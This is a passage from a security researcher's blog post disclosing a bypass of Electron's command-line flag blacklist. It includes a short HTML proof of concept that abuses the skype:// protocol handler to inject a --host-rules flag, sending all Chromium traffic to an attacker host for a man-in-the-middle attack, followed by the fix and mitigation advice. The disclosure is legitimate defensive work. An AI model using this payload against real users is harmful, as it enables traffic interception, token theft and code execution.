As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments such as Electron:

The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted
Bypass and security implications
We started looking for missed flags and noticed that host-rules were absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>
When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oOAuthtokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With
nodeIntegration
enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason, Electron’s update feature, along with other critical functions, are not affected by this vulnerability.

Future
On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in
setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
'--your-switches-here',
'--'
])
or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.